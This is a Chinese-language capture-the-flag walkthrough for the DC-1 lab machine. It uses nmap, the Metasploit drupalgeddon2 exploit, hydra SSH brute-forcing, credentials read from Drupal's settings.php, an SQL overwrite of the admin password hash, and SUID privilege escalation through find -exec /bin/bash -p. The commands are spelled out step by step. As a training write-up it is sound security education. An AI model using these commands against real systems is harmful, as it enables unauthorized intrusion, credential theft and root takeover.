将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。
1.使用命令 arp -scan -l 列出当前局域网的所有设备,在DC-1的网络适配器查看到的mac地址和扫描出来的192.168.1.8一致。
arp -scan -l
**2.**使用nmap来扫描DC-1
nmap -A 192.168.160.26
从扫描结果可以看到有22和80端口,因为还不知道DC-1所使用的用户,所以还不能爆破ssh,先访问一下80端口网页。
**3.**访问到的web界面,发现需要账号密码登录,使用burp爆破没有结果。但是发现了CMS,尝试去msf的漏洞库搜索一下。
首先了解一下Drupal 它是开源CMS之一 Drupal是CMS内容管理系统并且备受青睐和关注 Drupal可以作为开源软件免费使用 就是附带了cms的php开发框架 使用度颇高
第一步: 启动postgresql数据库: service postgresql start;或者/etc/init.d/postgresql start;
service postgresql start
第二步:初始化MSF数据库:msfdb init;
sudo msfdb init
第三步:运行msfconsole:
msfconsole
第四步:在msf中查看数据库连接状态:db_status。
db_status
**4.**在msf漏洞库搜索Drupal,并攻击
启动msf的数据库
msfdb start
启动msfconsole
搜索 search Drupal
使用第二个漏洞
use 2
使用show missing查看一下必须要设置的选项
需要设置rhosts,就是设置靶机的IP地址
使用set设置
set rhosts 192.168.160.26
使用show options 可以查看设置好的信息
确定设置的信息没问题
输入run开始执行攻击,成功
flag1
ls可以看到第一个flag1.txt
第一个falg找到
5.查看一下靶机的用户,发现有个flag4的用户
cat /etc/passwd
6 使用hydra来爆破一波看看是否能拿到密码 (Hydra的使用教程)
hydra -l flag4 -P /usr/share/john/password.lst 192.168.160.26 ssh
得到falg4账号的密码为 orange
7.使用ssh连接靶机
ssh flag4@192.168.160.26
flag4
ls在flag4账户的目录下找到了falg4,可想而知还有在前面还有两个flag,可能在web上,因为web有账号
ls
cat flag4.txt
8.既然已经登录进靶机了,那么我们就去查看一下web的配置文件
进入到var/www的目录下
在百度上可以找到drupal的配置文件是
/var/www/sites/default/settings.php
使用命令查看一下
cd /
cd /var/www
cat sites/default/settings.php
在配置文件中看到了flag2还有数据库的信息
flag2
数据库的账号:dbuser 密码: R0ck3t
- 使用命令连接数据库
mysql -u dbuser -p
连接成功
查看一下数据表
show databases;
使用数据表
use drupaldb;
查看表的数据
show tables;
注意到表里的users
使用命令查看一下
select * from users;
可以看到管理员的账户,但是先要搞hash值,有点难
quit退出数据库连接
10 .搜索一下*hash.sh
find / -name "*hash.sh"
可以看到var/www/scripts下有个sh的脚本
直接执行试试
scripts/password-hash.sh
可以设置密码,尝试一下后面加上密码
scripts/password-hash.sh jw123
#$S$DDJQnCUwMz0vMnJi5MKtGCoeyNWuEpDzZmYWxJm9g/G.gS6AE5ro
得到一个哈希值,那么我们可以将这个哈希值替换到数据库admin得账号下
11、 修改数据库中admin的哈希值
update drupaldb.users set pass='$S$DDJQnCUwMz0vMnJi5MKtGCoeyNWuEpDzZmYWxJm9g/G.gS6AE5ro' where name='admin';
修改成功尝试去web界面登录试试
flag3
找到flag3
12 .falg4提示我们提权
flag5
find -name flag4.txt -exec /bin/bash -p \;
/bin/bash -p:这是要执行的命令。/bin/bash 是一个常见的 Unix/Linux shell,而 -p 选项表示以特权(即以 root 用户)运行 bash。这将打开一个交互式 shell 环境,具有 root 用户权限。
查看权限:
whoami #打印当前有效的用户名称 id #显示用户的ID以及所属群组的ID
find -name flag4.txt -exec cat /root/thefinalflag.txt \;
DC-1总结
nmap的基础使用,信息收集
msf漏洞库搜索漏洞
使用漏洞攻击靶机拿到shell,找到第一个flag,查看/etc/passwd发现flag4用户
使用hydra爆破ssh登录的账号密码
登陆账号拿到第二个flag
查看到durpal的配置文件,获取到数据库信息,拿到第三个flag
尝试连接数据库,在数据库里发现admin账号,修改管理员的hash值
登录到web界面,拿到第四个flag
提权root拿到第五个flag
方式二
flag1
启动kali 查看本机地址
推测DC-1主机应该在同一网段 所以使用nmap扫扫看
扫到了四 台主机 2 254 26 10
其中可以看到 主机26和10的80端口处于open态 尝试一下
发现了一个CMS 很明显的信息 Drupal
First 先了解一下Drupal 它是开源CMS之一 Drupal是CMS内容管理系统并且备受青睐和关注 Drupal可以作为开源软件免费使用 就是附带了cms的php开发框架 使用度颇高
然后利用 MSF 攻克
先搜索一下可用的 drupal漏洞
这里我们使用第四个18年的这个 :exploit/unix/webapp/drupal_drupalgeddon2
提前看一下参数 (options)
看到RHOSTS为空 需要我们来配置一下,并查看
其中 配完提前检查再run
完成后就可以利用这个漏洞了
发现了flag第一个文件
打开看看 再给我们下一关的提示 (每一个好的CMS都需要一个配置文件--你也是)
flag2
下一个攻克点提示我们在配置文件中
百度上找到drupal的配置文件的绝对路径是 /var/www/sites/default/settings.php
进入durpal 配置文件
逐层解剖 找到flag2文件 进行读取
还有意外收获 不仅得到了flag2 还得到了数据库的user password
flag3
查看3306是否开放 (netstat -anptl) 显示只允许本地连接
写进一个python进行交互
python -c "import pty;pty.spawn('/bin/bash')"
登录数据库 前面我们已经拿到了 user password
列出数据库
使用drupaldb库 查看里面的表 存在users表
查看users表
又得到了数据库的用户名和密码 但是password采用了特殊的加密方式 无法解密 换种思路 那我们就来替换它
在scripts录有password-hash.sh文件 是可以用该文件生成自己的密码hash值替换数据库hash达到登陆后台的目的 这里换成admin
紧接着替换原来的密码 先进库
替换原始密码的语句 update users set pass='DBW9j2aCDzy4ErP.VhrfBpUwhfHOEwvjxLtfAOP69pV3CzJK3Hya' where name='admin'
转去页面登录 得到flag3
flag4
cat /etc/passwd 发现了一个用户 flag4 白送人头
得到flag4
flag5
flag3提示 提权并提示 -exec 想到suid提权 find 命令
使用find命令查找有特殊权限suid
的命令
find / -perm -4000
使用find命令提权
find ./ aaa -exec '/bin/sh' \;
得到flag5